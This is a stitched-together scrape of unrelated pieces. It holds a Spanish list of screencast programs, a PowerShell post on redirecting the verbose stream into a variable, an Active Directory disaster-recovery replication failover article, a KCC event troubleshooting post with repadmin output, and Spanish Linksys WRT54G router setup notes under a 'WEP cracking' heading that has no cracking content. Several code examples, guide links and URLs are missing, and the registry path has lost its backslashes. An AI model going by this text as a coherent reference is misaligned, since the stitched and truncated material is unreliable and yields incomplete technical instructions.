BBFlashBack es otro software de captura, que además tiene un pequeño editor para gestionar tu grabación. Existen varias versiones de este software, BBFlashBack Pro (199 dólares) yBBFlashBack Standard (89 dólares), sin embargo, BBFlashBack Express es gratuita, y sólo tienes que registrarte para poder utilizarla.

BBFlashBack Express permite guardar las capturas en vídeo (AVI) o en formato flash (SWF), incluyendo sonido o webcam, o un asistente para subir directamente a Youtube, ideal para tutoriales online.

URL | BBFlashBack Express ~12MB

5. Ezvid

Existen muchos programas para la creación de screencast, pero si tu objetivo es crear vídeos para youtube sin más complicaciones, hay uno realmente apropiado: Ezvid.

Con un interfaz limpio y accesible, puedes capturar tu actividad en pantalla, grabar audio desde micro, sintetizar voz, permitiendo también editar el resultado, añadir imágenes, vídeos o textos secundarios e incluir música de fondo (de una lista específica sin copyright).

Eso sí, cabe remarcar que se trata de una aplicación muy simple (y posiblemente muy limitada para usuarios avanzados) que permite grabaciones de máximo 10 minutos. De hecho, sólo permitesubir vídeo a youtube directamente, sin posibilidad de exportar a un archivo.

URL | Ezvid ~1MB

Si te interesan más sistemas similares, muy simples pero vía web, puedes probar ScreenR oScreencast-o-matic, ambos con versiones gratuitas y modalidades de pago con diversas características.

6. Freeseer

Freeseer es un proyecto open source realizado en Python/Qt4, orientado a la grabación de screencasts en plataformas Linux y Windows (Mac aún no disponible). Permite la grabación de una región concreta de pantalla, realizar la grabación por software o hardware, establecer diferentes resoluciones o incluso realizar streaming.

URL | Freeseer ~1MB

7. Istanbul

Este sencillo pero potente programa, permite seleccionar una ventana (o área) de un escritorio de Linux, y realizar la grabación en vídeo de la actividad que se produzca en dicha región. Permite algunas opciones básicas como la grabación de actividad 3D, ocultar el puntero del ratón o grabar sonido.

El formato de destino es Ogg Theora Vídeo (OGV), un codec libre de vídeo libre de patentes. Funciona en entornos de escritorio como KDE, Gnome, XFCE u otros.

URL | Istanbul

8. Jing

Jing es un software gratuito, desarrollado por los creadores del conocido CamTasia (de pago, 282 euros) y el no tan conocido SnagIt (47,95 euros). Si bien, no es tan completo como sus hermanos mayores, sirve perfectamente para su cometido.

Permite guardar la actividad de tu pantalla y exportarla a un archivo flash (SWF). Los vídeos como máximo, permiten 5 minutos de duración y requieren el registro gratuito en

URL | Jing ~7MB

9. Wink

Otro software gratuito para creación de presentaciones es Wink. Funciona tanto en plataformas Windows como Linux, y permite realizar capturas con posibilidad de edición.

Los formatos de salida son un tanto diferentes, puesto que está orientado a las presentaciones de escritorio y sólo permite la exportación en formato flash (SWF), auto-ejecutables (EXE), documentos (PDF o PS) o imágenes en archivos HTML.

URL | Wink ~3MB

10. RecordMyDesktop

Para los usuarios avanzados de Linux, que acostumbran a usar las terminales de texto, tenemos RecordMyDesktop, un software que permitirá capturar la pantalla de nuestro escritorio (o una región de pantalla) directamente desde un comando con sus respectivos parámetros, muy útil para crearnos nuestros propios scripts personalizados.

El formato de vídeo generado es Ogg Theora Vídeo (OGV).

URL | recordMyDesktop

Si no te convence esta aplicación, puedes probar otros programas similares como glc, considerado el Fraps (29,95 euros) de Linux, o byzanz, muy similar a recordMyDesktop pero permite otros formatos como GIF o FLV.

11. CaptureFox

Existe un plugin para el navegador Mozilla Firefox que permite realizar capturas de pantalla en formato de vídeo, llamado CaptureFox.

Es completamente gratuito, pero desgraciadamente, en el momento de escribir estas líneas, no es compatible con la reciente última versión de Firefox (16.0.1), por lo que sólo puede utilizarse desde una versión anterior.

URL | CaptureFox

12. ActivePresenter Free Edition

ActivePresenter Free Edition es un genial software de grabación de vídeo que permite capturar la actividad en pantalla y editarla, y exportarla en varios formatos de vídeo, entre los que se encuentran WMV, AVI, MPEG4 y WebM.

Existen 3 versiones diferentes, entre las que se incluyen ActivePresenter Standard (349,95 dólares), ActivePresenter Professional (449,95 dólares) y ActivePresenter Free Edition (gratuito), el cuál no tiene límite de duración en la grabación ni coloca ninguna marca de agua publicitaria.

URL | ActivePresenter

13. Cropper

Cropper se sale un poco del ámbito de esta lista de programas, ya que es un software orientado a la captura de imágenes estáticas de nuestra pantalla.

Sin embargo, he querido incluirlo por la capacidad de crear GIF Animados, mediante el plug-in AnimatedGif, lo que permitirá realizar ciertas capturas de pequeños procesos o actividades con colores «lisos» de forma óptima y ocupando poco espacio.

El plugin también permite generar capturas de pantalla y enviarlas automáticamente a sitios como FacebookFlickrImgurTwitter u otros.

URL | Cropper

14. Taksi

Taksi pretende ser una alternativa open source al famoso Fraps, permitiendo la grabación de vídeos de nuestro escritorio o incluso juegos 3D. Permite la grabación de DirectX 8 y 9, OpenGL e incluso GDI.

NOTA: Aunque la web oficial menciona que la captura de audio no es funcional (en la v0.7.6), en la versión actual (v0.7.7.9-dev) funciona correctamente.

URL | Taksi

15. Ultra Screen Recorder

Ultra Screen Recorder parte de una idea muy ingeniosa. Se trata de un plugin para el softwareUltraVNC, una variante del programa de administración remota VNC.

La idea es que, como la mayoría de aplicaciones de grabación de imágenes, consumen muchos recursos y no pueden realizarse con una tasa de fps (fotogramas por segundo) alta, se utiliza un programa de administración remota para capturar en vídeo la actividad de la pantalla.

Eso sí, es aconsejable que sólo sea utilizado por usuarios avanzados, ya que se necesitan conocimientos técnicos de redes y administración remota.

URL | UVNC Screen Recorder

16. Krut

Krut es un software open source multiplataforma (basado en Java) que permite realizar capturas de vídeo (y de pantalla) en archivos separados con una personalización bastante alta. Las grabaciones se realizan en formato Quicktime (MOV) y el sonido en formato WAV, por separado.

URL | Krut

17. XFire

XFire es un programa de mensajería para Windows, que permite integrarse en nuestros juegos y permitir la captura de vídeo e imágenes e incluso hacer streaming. Puedes registrarse y descargarlo desde la propia web de XFire.

URL | XFire

18. Método para usuarios avanzados

Existen varias aplicaciones con las que también podemos realizar capturas de pantalla en vídeocon parámetros más específicos y con un rendimiento, probablemente, mucho mayor. Sin embargo, sólo es aconsejable para usuarios avanzados, puesto que estos métodos son mucho más complejos y menos intuitivos.


Con el famoso editor open source VirtualDub se pueden realizar capturas de vídeo, ya que tiene una opción (Capture AVI) que permite recuperar la actividad de nuestro escritorio o webcam en formato de vídeo. Algunas guías:

VideoLAN (VLC)

VLC es un estupendo reproductor de vídeo, que permite muchísimas posibilidades al margen de la reproducción de vídeos (la más común), entre ellas volcados de red, streaming o captura de actividad de pantalla en vídeo. Una guía a continuación:


FFMpeg es un potentísimo sistema para grabar, capturar o transformar vídeos y formatos, con el que se puede realizar casi cualquier operación de vídeo. A continuación, una guía con FFMpeg:

Mencionar también la existencia de Screen Capture Recorder, un proyecto en GitHub, que ayuda a la grabación de vídeo bajo Windows.


Un increíble programa para capturar fragmentos de la pantalla, sencillo, muy cómodo y con una interfaz agradable y simple. Es compatible con codecs como XviDx264vfw o VP8, los cuales puedes descargar desde codecs para oCam.



Programmatically capture Verbose Output in a PowerShell variable

Programmatically capture Verbose Output in a PowerShell variable


I was playing around with the cmdlets in the DFSR-module the other day and realized that none of them could (as far as I could tell) give me a reliable count on the number of items in the DFSR Backlog.
My plan was to initiate a replication of two folders and then have a script monitor the backlog to generate status messages to keep me informed of the progress.
I searched for a way to accomplish this by looking at the commands in the DFSR module that have the verb Get
PS C:> Get-Command -Module DFSR -Verb Get


CommandType     Name                                               ModuleName
Cmdlet          Get-DfsrBacklog                                    DFSR
Cmdlet          Get-DfsrCloneState                                 DFSR
Cmdlet          Get-DfsrConnection                                 DFSR
Cmdlet          Get-DfsrConnectionSchedule                         DFSR
Cmdlet          Get-DfsReplicatedFolder                            DFSR
Cmdlet          Get-DfsReplicationGroup                            DFSR
Cmdlet          Get-DfsrFileHash                                   DFSR
Cmdlet          Get-DfsrGroupSchedule                              DFSR
Cmdlet          Get-DfsrIdRecord                                   DFSR
Cmdlet          Get-DfsrMember                                     DFSR
Cmdlet          Get-DfsrMembership                                 DFSR
Cmdlet          Get-DfsrPreservedFiles                             DFSR
Cmdlet          Get-DfsrServiceConfiguration                       DFSR
Cmdlet          Get-DfsrState                                      DFSR
The the Get-DfsrBacklog seems just like the thing I’m looking for. Just to make sure I had a look into the help for that cmdlet
and got a little amazed when realizing that it would return the first 100 objects in my replication backlog.
That’s great and all, but what if I want the total count? Are there hundreds or millions of items in the backlog? There is no way (that I could find) to return the total number of objects in the backlog, BUT if the –Verbose switch is used the command will write a message to the Verbose stream stating something similar to:
The replicated folder has a backlog of files. Replicated folder: “ReplFolder”. Count: 46314
No backlog for the replicated folder named “ReplFolder”
And there it is folks! Anyone can run the command and read the verbose message. Anyone but my script which couldn’t care less about the Verbose stream. Or does it?
This is where a great little feature in powershell called redirection comes in handy. This feature was introduced already in Powershell version 2.0 but back then it was limited to only redirect two streams, the Success Output (the common output that I usually refer to as pipeline) and the Errors steams. In Powershell version 3.0 it got even more powerful and now we can direct any of the five outputstreams (Success, Error, Warning, Verbose and Debug) to either the success output stream or to a file of our choosing using the redirect operator ‘>’.  The syntax is easy, first enter the number of the outputstream that should be redirected from the table below followed by the operator > and the target of the redirection.
* All output
1 Success output
2 Errors
3 Warning messages
4 Verbose output
5 Debug messages
To test this I wrote a function that will output text to different streams.


function Write-ToStreams
        $VerbosePreference = ‘Continue’
        $DebugPreference = ‘Continue’
        Write-Host “This is written to host” -ForegroundColor Green
        Write-Output “This is written to Success output”
        Write-Error “This is an error”
        Write-Warning “This is a warning message”
        Write-Verbose “This is verbose output”
        Write-Debug “This is a debug message”
Which gives me the following output:
Now if I want to redirect my verbose output I’ll end my command with the number of the verbose output stream, ‘4’, followed by the redirect operator ‘>’ and the target of my redirection.
The other option is to redirect one output stream to the success output stream by using &1 as the target like this:
Which looks exactly like the first time we ran the command! But this time the verbose message is actually written to the output stream.
To test this let’s store the output in a variable:
And this is the answer to my problem with the count of files in the DFSR Backlog. I just have to separate the default output from the verbose output.
So lets start over by running the function Write-ToStreams and storing the output in a variable without redirection:
$Output = Write-ToStreams
This would output messages to all streams but the Success output, which would be caught by my $Output variable. To catch the other streams I use another feature called a subexpression. A subexpression is like a scripted variable, for example by writing $(Get-Date –f $FormatString), the code within the parentheses is executed and the result will be returned like it came from a variable. By enclosing out previous example in a subexpression we get the opportunity to redirect the verbose output and capture it in another variable like this:
$VerboseMessage = $($Output = Write-ToStreams) 4>&1
Which could be repeated for any of the remaining three streams Error, Warning and Debug. A very important thing to notice here is the green text created by Write-Host. This text cannot be redirected or captured at all, which makes Write-Host something that only should be used if the intent is to write something to screen and never ever for actual output. Use any of the other streams for output.
To get back to my problem with the count of items in the dfsr backlog, I wrote a script that will return the number of items in the backlog for each replicated folder using this technique and it is available on the Technet Gallery.
For a more information about redirection, please refer to the help article about_Redirection.

Disaster Recovery Site and Active Directory (Part 3 of 3)

Disaster Recovery Site and Active Directory (Part 3 of 3)

Welcome to part 3 of the series… hopefully you have enjoyed the first two parts where we have discussed client logon and clients failover between Domain Controllers and sites.

In the last part of the series we’re going to discuss Domain Controller replication failover between a Hub, Branch and DRP sites and different scenarios when doing so.

While talking about AD replication, it’s important to note that usually Active Directory replication isn’t considered as the most critical service in the environment, and I absolutely agree.. An environment can work seamlessly when Active Directory replication is not working. Obviously having Active Directory not replicating for long periods of time may cause issues, inconsistencies and other problems (long period => Tombstone Life Time), but having AD not replicating in the middle of the night wouldn’t get me out of bed running to my computer in order to fix the issue.. On the other hand, I would go and do that first thing in the morning.

Now back to our environment.. again, we’ll start with the simplest scenario, of one Domain Controller in each site:
In our environment we have two Branch sites (Branch and Branch2) which are connected to the HUB site, each with a site link cost of 100.
The HUB site is connected to the DRP site with a site link cost of 10. Bridge All Site Links (BASL) is enabled in the environment. Having said that an attempt to calculate the routes in the environment would result in the following (ordered based on costs):
From Branch
1. Branch –> Hub = 100
2. Branch –> DRP = 110 (Branch –> HUB –> DRP).
3. Branch –> Branch2 = 200 (Branch –> HUB –> Branch2)

From Branch2
1. Branch2 –> HUB = 100
2. Branch2 –> DRP = 110 (Branch2 –> HUB –> DRP)
3. Branch2 –> Branch = 200 (Branch2 –> HUB –> Branch).

(A short reminder to make things clearer: BASL – Bridge All Site Links, means all site links are transitive. More information on BASL and AD replication topology can be found here –

In that scenario it’s obviously expected that the Branch sites (Branch and Branch2) would failover to the DRP site if the HUB site fails, instead of failing over to each other. (A matter of cost calculation, based on the table mentioned Branch –> DRP is cheaper than Branch –> Branch2).
So let’s fail the DC in the HUB site…

Running repadmin /showrepl on Child-DC04 would show we already have several failed attempts to replicate with the Domain Controller in the HUB site:

So the question is:
What are we waiting for?
Well… the answer is this:
Value: Number of failed attempts
Default: 1

MaxFailureTimeForIntersiteLink (sec)
Value: Time that must elapse before being considered unavailable, in seconds
Default: 7200 (2 hours)

(All described here – and
Basically we’ll wait for 2 hours before the source DC for replication is considered stale. So in our scenario when we have failed the DC in the HUB site it would take 2 hours from the last replication attempt for the DCs in the Branch sites to consider the DC in the HUB site as stale.
After the time and the number of failures have elapsed we will get the following event:
Event ID 1308, stating that “The Knowledge Consistency Checker (KCC) has detected that successive attempts to replicate with the following directory service has consistently failed.” and that “The Connection object for this directory service will be ignored, and a new temporary connection will be established to ensure that replication continues. Once replication with this directory service resumes, the temporary connection will be removed. “
And a short while later we have received Event ID 2053: “A new connection has been created to address site connectivity issues.”


Looking at our environments Visio diagram now would show (as expected):
Child-DC03 and Child-DC04 have created failover connection objects with Child-DC02, which is located at the DRP site, and vice versa, Child-DC02 has created failover connection objects with the DCs at the Branch and Branch2 sites.
So how long did this process take?
Well – we need three events to take place:
1. At least one replication attempt to occur, meaning if the link to the HUB site has failed at 3PM, but we have a replication schedule on the site link configured to replicate only at 1AM we wouldn’t even try to replicate before that time… so how would we know the site link has failed?!
2. After we have at least one failed replication attempt (stated in the InterSiteFailuresAllowed registry) we begin counting the Failure time – as stated in the “MaxFailureTimeForIntersiteLink (sec)” registry key.
3. After the MaxFailureTimeForInterSiteLink has elapsed we need KCC to run (which by default occurs every 15 minutes).

So it very much depends on the environment how long it would take the failover connection objects to be created.

What Can I do to make it faster?
First of all, take things in perspective!
if you replicate once in 24 hours, how bad can it be to be 48 hours without replication? Like I mentioned in the beginning of the post – Active Directory not replicating would not get me running anywhere, it would just one of those things on the TODO list  (unless obviously it’s a symptom for another issue – like all DCs have crashed on no one in the organization can work… well… I wouldn’t consider that as a replication problem to be honest, but that’s a matter of semantics cause I can see there’s a replication issue there among other problems חיוך קורץ).
If you still feel the failover time is not enough, and you need to expedite the failover times you can set the “MaxFailureTimeForIntersiteLink  (sec)” value to a lower value.
Again from
Modifying the thresholds for excluding nonresponding servers requires editing the following registry entries in HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNTDSParameters, with the data type REG_DWORD. You can modify these values to any desired value as follows:
For replication between sites, use the following entries:

  • IntersiteFailuresAllowed
    Value: Number of failed attempts
    Default: 1
  • MaxFailureTimeForIntersiteLink (sec)
    Value: Time that must elapse before being considered unavailable, in seconds
    Default: 7200 (2 hours)

You will have to perform this on every DC in every Branch site (as those are the ones counting the fails).
You also need to take care while reducing this as having a very low value for this setting may cause false positives when failing between DCs, and since a failover can be an expensive operation we want to minimize the false positives as much as possible.
Note: Whatever you do – Don’t go creating manual connection objects! Manage the KCC and the topology of the environment to match your requirements, don’t override it with manual connection objects.

Failing back
Usually that’s not a concern, but many times this question rises. What happens when the failed DC has come back online?
Well – KCC is aware of that when we have a successful replication attempt with the failed DC (and again, that’s based on our replication topology, schedule and times).
So the next time KCC is run we will receive event 1129 stating “To improve the replication load of Active Directory Domain Services, a replication connection from the following source directory service to the local directory service was deleted. “

So those temporary failover connection objects created for failover to the DR site are automatically deleted when the “best” DC (in our case – the DC at the HUB site) comes back online.

So now that we know how failover works lets just briefly discuss the following scenario:
Two Domain Controllers in the HUB site

Let’s imagine that the physical site link between the Branch site and the HUB site have failed (to simulate that I’ll shutdown the Active Directory Domain Services service on both DCs in the HUB site – Child-DC01 and Child-DC04.
So the first things occurs is exactly as previously: Child-DC03 (Branch) identifies that the current replication partner in the HUB site (Child-DC01) has failed and Event ID 1308 is generated on Child-DC03 (just as previously) stating “The Knowledge Consistency Checker (KCC) has detected that successive attempts to replicate with the following directory service has consistently failed. ” and “The Connection object for this directory service will be ignored, and a new temporary connection will be established to ensure that replication continues. Once replication with this directory service resumes, the temporary connection will be removed. “.

Now is the different part:
The new connection object that is generated is with Child-DC01 (HUB):
Event ID 2054 stating:
“The Knowledge Consistency Checker (KCC) created a new bridgehead failover connection because the following bridgeheads used by existing site connections were not responding or replicating. 
CN=NTDS Settings,CN=CHILD-DC04,CN=Servers,CN=HUB,CN=Sites,CN=Configuration,DC=trdemo,DC=local”
was generated on Child-DC03.
So Child-DC03 has failed over from Child-DC01 to Child-DC04. Is this the expected behavior???
The answer is yes! If you scroll back up you will note that I was stating all the time that we identify failed Domain Controllers. There is no possible way of identifying site link failures. So in terms of Active Directory replication a failed site is a site where all DCs are not responsive.
And that’s an important thing to remember. So in this scenario where we have two Domain Controllers in the HUB site we count the InterSiteFailuresAllowed and the “MaxFailureTimeForIntersiteLink (sec)” values for each Domain Controller in the site.
So with this scenario if the MaxFailureTimeForInterSiteLink is the default 2 hours we are talking 4 hours for failover to the DRP site.
Now let’s talk specifically about our test environment:
I have set the MaxFailureTimeForIntersiteLink  (sec) to a value of 300 seconds(decimal) – 5 minutes:
Meaning that 5 minutes of replication failures on an inter-site connection object would consider the source Domain Controller as failed.
So we have Child-DC01 and Child-DC04 failing since (repadmin /showrepl output on Child-DC03):
******* 8 CONSECUTIVE FAILURES since 2011-12-11 12:58:52

So taking the times we have configured are:
12:58:52 + 5 minutes (MaxFailureForIntersiteLink time) = 13:03:52. So at 13:03:52 Child-DC04 will be considered stale, after which we’ll wait for KCC to run.
Since KCC runs every 15 minutes it depends on where in the 15 minutes timeframe we catch the KCC.
The KCC is generating Event 1308 stating that it has identified the failed Domain Controller, followed by Event 2052 stating a new connection object has been created with Child-DC01 (as expected we try to failover between DCs in the HUB site):
Next time the KCC is running (which is 15 minutes later @ 13:41:17) we still try to establish a connection object with Child-DC01 (or new selected server at the HUB site).
Next time KCC is run (that’s at 13:56:17) we have identified Child-DC01 as a stale server:
Event ID 1307 stating that “The Knowledge Consistency Checker (KCC) has detected that attempts to establish a replication link with the following directory service has consistently failed. “
And only then we consider the HUB site as stale!
And we have Event ID 1566 to support that:
All directory servers in the following site that can replicate the directory partition over this transport are currently unavailable. 

So now we can failover to the DRP site:
Event ID 2053 is generated, stating that we have created a new connection object for failover, and this time it’s with Child-DC02 located at the DRP site:
So overall the process took us about 1 hour to failover, and that’s with the MaxFailureForIntersiteLink set to a very low value (5 minutes). So with the default setting of 2 hours you can expect 4-4.5 hours (depending on KCC intervals and where you catch them) to failover between a branch site and a HUB site containing two Domain Controllers.

How can we make the process faster?
Just as previously – Take things in perspective. Ask – what happens if my environment doesn’t replicate for 5 hours? Do I even need to change anything?
If you do need to decrease the MaxFailureForIntersiteLink  value again, take into consideration the false positives which may result if setting this value to a value which is too low.

Now – if you feel like asking “so what happens if I have 3 DCs in the HUB site?” just use your own logic…חיוך קורץ (Let me give you a hint – We wait for MaxFailureForIntersiteLink for each DC).

So hopefully it makes sense… now after I completely broke my Lab environment while writing this post I think I’m going to spend some time setting things back to Normal (e.g – Default).
Hope you enjoyed and it will make some more sense when troubleshooting/planning or testing your DRP scenarios.
And let me end on a cheerful note – A DRP site is not a DR Plan!!! In other words: Now that you got your DR site all sorted out, it’s time to go and test your other DR scenarios!
(And our colleagues from the UK have nicely listed all the scenarios in one place –

Hope we all never need it!


Sites begins logging Knowledge Consistency Checker (KCC)

I’m a Support Escalation Engineer on the Directory Services Support team.

I’m going to discuss a recent trend I’ve seen where Active Directory Replication appears to be fine but one DC only in one (or more) sites begins logging Knowledge Consistency Checker (KCC) Warning and Error events in the Directory Service event log. I included sample events below.

For those not familiar with the KCC, it is a distributed application that runs on every domain controller. The KCC is responsible for creating the connections between domain controllers and collectively forms the replication topology. The KCC uses Active Directory data to determine where (from what source domain controller to what destination domain controller) to create these connections.

In some cases these errors are logged all the time and in others they are logged at regular intervals and they clear on their own only to reappear like clockwork. Typically other DCs in the same site(s), perhaps even in the whole forest, report no KCC errors at all. In some cases the DC logging these errors have a small number of connection objects compared with their peer DCs in the same site:

Event Type: Warning 
Event Source: NTDS KCC 
Event Category: (1) 
Event ID: 1566 
Date: 5/14/2008 
Time: 1:51:23 PM 
Computer: DC1X 
All domain controllers in the following site that can replicate the 
directory partition over this transport are currently unavailable.

Directory partition: 
CN=IP,CN=Inter-Site Transports,CN=Sites,CN=Configuration,DC=contoso,DC=com


Event Type: Error 
Event Source: NTDS KCC 
Event Category: (1) 
Event ID: 1311 
Date: 5/14/2008 
Time: 1:51:23 PM 
Computer: DC1X 
The Knowledge Consistency Checker (KCC) has detected problems with the 
following directory partition.

Directory partition: 

There is insufficient site connectivity information in Active Directory 
Sites and Services for the KCC to create a spanning tree replication topology. 
Or, one or more domain controllers with this directory partition are unable 
to replicate the directory partition information. This is probably due to 
inaccessible domain controllers.

User Action 
Use Active Directory Sites and Services to perform one of the following 
– Publish sufficient site connectivity information so that the KCC can 
determine a route by which this directory partition can reach this site. This is 
the preferred option. 
– Add a Connection object to a domain controller that contains the directory 
partition in this site from a domain controller that contains the same 
directory partition in another site.

If neither of the Active Directory Sites and Services tasks correct this 
condition, see previous events logged by the KCC that identify the 
inaccessible domain controllers.

In some cases this event is also seen; it suggests name resolution is working but a network port is blocked:

Event Type: Warning 
Event Source: NTDS KCC 
Event Category: (1) 
Event ID: 1865 
Date: 5/14/2008 
Time: 1:51:23 PM 
Computer: DC1X 
The Knowledge Consistency Checker (KCC) was unable to form a complete 
spanning tree network topology. As a result, the following list of sites 
cannot be reached from the local site.


For more information on ISTG and Connectivity issues, see KB 944351 AD replication is not working with event 1865 logged.
If you encounter this issue it could be the DC logging the errors is hosting the Intersite Topology Generator (ISTG) role for its site. This role is responsible for maintaining all of the Inter-site connection objects for the site. This role polls each DC in its site for connection objects that have failed and if failures are reported by the peer DCs the ISTG logs these events indicating something is not right with connectivity.

For those wondering what these events mean here is a quick rundown:

The 1311 event indicates the KCC couldn’t connect up all the sites.
The 1566 event indicates the DC could not replicate from any server in the site identified in the event description.
When logged, the 1865 event contains secondary information about the failure to connect the sites and tells which sites are disconnected from the site where the KCC errors are occurring.
Ok, I’ll get to the point and explain how to identify the root cause and correct this. These errors are pointing to a topology or a connectivity issue. Either there are not enough site links to connect all the sites or more likely network connectivity is failing for a number of reasons.

If your network is not fully routed (the ability for any DC in the forest to perform an RPC bind to every other DC in the forest) make certain Bridge All Sites Links (BASL) is unchecked. If BASL is unchecked Site Links and/or Site Link Bridges must be configured. Site Links and Site Link Bridges provide the KCC with the information it needs to build connections over existing network routes. If the network is fully routed and you have BASL checked, fine.

While the network routes may exist the ports needed for Active Directory to replicate must not be restricted.

The assumption of this blog is these errors continue to be logged even though the site listed in the 1566 event has been added to a site link object and AD topology is correctly configured.

To locate the source of the KCC events and identify the root cause, you need to execute the following commands while the KCC events are being logged.

1) Identify the ISTG covering each site by running this command:

repadmin /istg

The output will list all sites in the forest and the ISTG for each site:

repadmin running command /istg against server localhost

Gathering topology from site Default-First-Site-Name (

                                 Site                                ISTG 
================== ================= 
                                 SiteX                               DC1X 
                                 SiteY                               DC1Y

NOTE: Determine from the output if the DC logging these events (DC1X) is the ISTG or not.

2) If the DC logging the events is the ISTG any one of the DCs in the same site as this ISTG could have connectivity issues to the site identified in the 1566 event. You can identify which DC(s) are failing to replicate from the site identified in the 1566 event by running this command which targets all DCs in the site that the ISTG logging the errors resides in. For example, DC1X is logging the events and it is the ISTG for siteX. To identify which DCs in siteX are failing to replicate from siteY run this command:

repadmin /failcache site:siteX >siteX-failcache.txt

The failcache output shows two DCs in siteX:

repadmin running command /failcache against server 

==== KCC CONNECTION FAILURES =========================== (none)

==== KCC LINK FAILURES ===============================     SiteYDC1Y         
    DC object GUID: 7c2eb482-ad81-4ba7-891e-9b77814f7473         
    No Failures.

repadmin running command /failcache against server 

==== KCC CONNECTION FAILURES =========================== (none) 

==== KCC LINK FAILURES ===============================     SiteYDC1Y         
    DC object GUID: 7c2eb482-ad81-4ba7-891e-9b77814f7473          
    46 consecutive failures since 2008-08-12 22:14:39. 
SiteZDC1Z        DC object GUID: fh3h8bde-a928-466a-97b0-39a507acbe54         
    No Failures.

The output above identifies the Destination DC as (DC2X) in siteX that is failing to inbound replicate from siteY. In some cases the DC name is not resolved and shows as a GUID ( If the DC name is not resolved determine the hostname of the Destination DC by pinging the fully qualified CNAME:


NOTE: DC2X may or may not be logging Error events in its Directory Services event log like the DC1X the ISTG is.

3) Logon to the Destination DC identified in the previous step and determine if RPC connectivity from the Destination DC to the Source DC (DC1Y) is working.

repadmin /bind

If “repadmin /bind DC1Y” from the Destination DC succeeds:
Run “repadmin /showrepl ” and examine the output to determine if Active Directory Replication is blocked. The reason for replication failure should be identified in the output. Take the appropriate corrective action to get replication working.

If “repadmin /bind DC1Y” from the Destination DC fails:
Verify firewall rules are not interfering with connectivity between the Destination DC and the Source DC. If the port blockage between the Destination DC and the Source DC cannot be resolved, configure the other DCs in the site where the errors are logged to be Preferred Bridgeheads and force KCC to build new connection objects with the Preferred Bridgeheads only.

NOTE: Running “repadmin /bind DC1Y” from the ISTG logging the KCC errors may reveal no connectivity issues to DC1Y in the remote site. As noted earlier, the ISTG is responsible for maintaining inter-site connectivity and may not be the DC having the problem. For this reason the command must be run from the Destination DC that repadmin /failcache identified as failing to inbound replicate

A successful bind looks similar to this:

C:>repadmin /bind DC1Y 
Bind to DC1Y succeeded. 
NTDSAPI V1 BindState, printing extended members. 
    bindAddr: DC1Y 
Extensions supported (cb=48): 
    BASE                             : Yes 
    ASYNCREPL                        : Yes 
    REMOVEAPI                        : Yes 
    MOVEREQ_V2                       : Yes 
    GETCHG_COMPRESS                  : Yes 
    DCINFO_V1                        : Yes 
    KCC_EXECUTE                      : Yes 
    ADDENTRY_V2                      : Yes 
    DCINFO_V2                        : Yes 
    CRYPTO_BIND                      : Yes 
    GET_REPL_INFO                    : Yes 
    STRONG_ENCRYPTION                : Yes 
    DCINFO_VFFFFFFFF                 : Yes 
    TRANSITIVE_MEMBERSHIP            : Yes 
    ADD_SID_HISTORY                  : Yes 
    POST_BETA3                       : Yes 
    GET_MEMBERSHIPS2                 : Yes 
    NONDOMAIN_NCS                    : Yes 
    XPRESS_COMPRESSION               : Yes 
    DRS_EXT_ADAM                     : No 
Site GUID: stn45bf5-f33f-4d53-9b1b-e7a0371f9a3d 
Repl epoch: 0 
Forest GUID: idk4734-eeca-11d2-a5d8-00805f9f21f5 
Security information on the binding is as follows: 
    SPN Requested:  LDAP/DC1Y 
    Authn Service:  9 
    Authn Level:  6 
    Authz Service:  0

4) If these events occur at specific periods of the day or week and then they resolve on their own, verify DNS Scavenging is not set too aggressively. It could be DNS Scavenging is so aggressive that SRV, A, CNAME and other valid records are purged from DNS causing name resolution between DCs to fail. If this is the behavior you are seeing, verify scavenging settings on these DNS zones:
Scavenging settings need to be checked on child domains if the Source or Destination DCs are in child domains.
Example: if Scavenging is set this way the outage will occur every 24 hours:

Non-refresh period: 8 hours 
Refresh period: 8 hours 
Scavenging period: 8 hours

To correct this change the Refresh and Non-refresh periods to 1 day each and set scavenging to 3 days. See Managing the aging and scavenging of server data on Technet to configure these settings for the DNS Server and/or zones.

Hopefully this clears up the mysterious KCC errors on that one DC.

– David Everett

AD Replication, David Everett

 Delicious Save this on Delicious
Anonymous Anonymous 31 Oct 2008 11:01 PM
PingBack from

Anonymous Anonymous 4 Nov 2008 10:51 PM
I refuse to post anything regarding the election, so here are some interesting (or may not so interesting)

Chris-au Chris-au 8 Oct 2010 2:15 AM
great article, thanks.


WEP cracking [In 10mins] + Configurar Wi-Fi Linksys WRT54G

Configurar Wi-Fi Linksys WRT54G

1) Entrá con el browser a
2) Usuario en blanco, password; la que hayas puesto cuando estbas haciendo el wizard del CD.
3) Sección Wireless -> Wireless Security
Ahí elegís el tipo de encriptado y una contraseña. No sé cuál es el mejor, yo en particular tengo WPA2 Personal y AES.
4) Poné esa misma configuración en las máquinas que se conecten wireless.

Linksys BEFSR41 V3 y WRT54GS sin Internet :

Modo 1
Conectalo directo de la salida del modem a la wan del WRT54GS
Entra al WRT54GS y mandale que te conectas a travez de ip statica y que quede algo asi.

configuracion ip static de conexion.
ip address:
puerta de enlace:

Configura el modem en modo bridge.
entra al WRT54GS y en la configuracion de conexion o wan ponele pppoe y mandale tu user y pass de internet

configurar el modem y el WRT54GS con el mismo rango de IP
DHCP: del al


De las 3 maneras te podes conectar bien, Lo unico siempre recorda de ponerle contraseña a la wireless .


Yo estoy usando este Firmware Hyperwrt 2.1b1 + Thibor15c en 2 routers wrt54gl y hasta ahora no tuve ningún inconveniente. Los usos como WDS + AP y andan muy bien (el firmware que viene de fábrica no permite WDS). La verdad que parece otro router con este firmware.

  • Major Projects
    • DD-WRT[4] Paid and free versions available. (Linux/GPL)
    • HyperWRT Thibor[5] Firmware based on stock WRT54GS firmware, HyperWRT +tofu and other additions.
    • OpenWrt[6] Firmware with a JFFS2 file system for package management. (Linux/GPL)
    • Sveasoft[7] Paid and free versions available. Latest versions available via subscription.
    • Tomato[8] Firmware featuring a number of web innovations such as Ajax and SVG graphs. The Tomato Manual is available at Wikibooks. (Linux/GPL)
  • Minor projects
    • BatBox – RAM based distribution for experimenting, does not change firmware
    • Bluebox – Automatic open Internet scanning and bridging software that runs on WRT54G with OpenWRT.
    • ChillispotCaptive portal software that runs on WRT54G and other platforms, available under GPL
    • Earthlink‘s IPv6 Firmware – IPv6 feature added to original Linksys firmware (beta-test version)
    • EWRT – Enhanced WRT, with integrated captive portal based on NoCatSplash
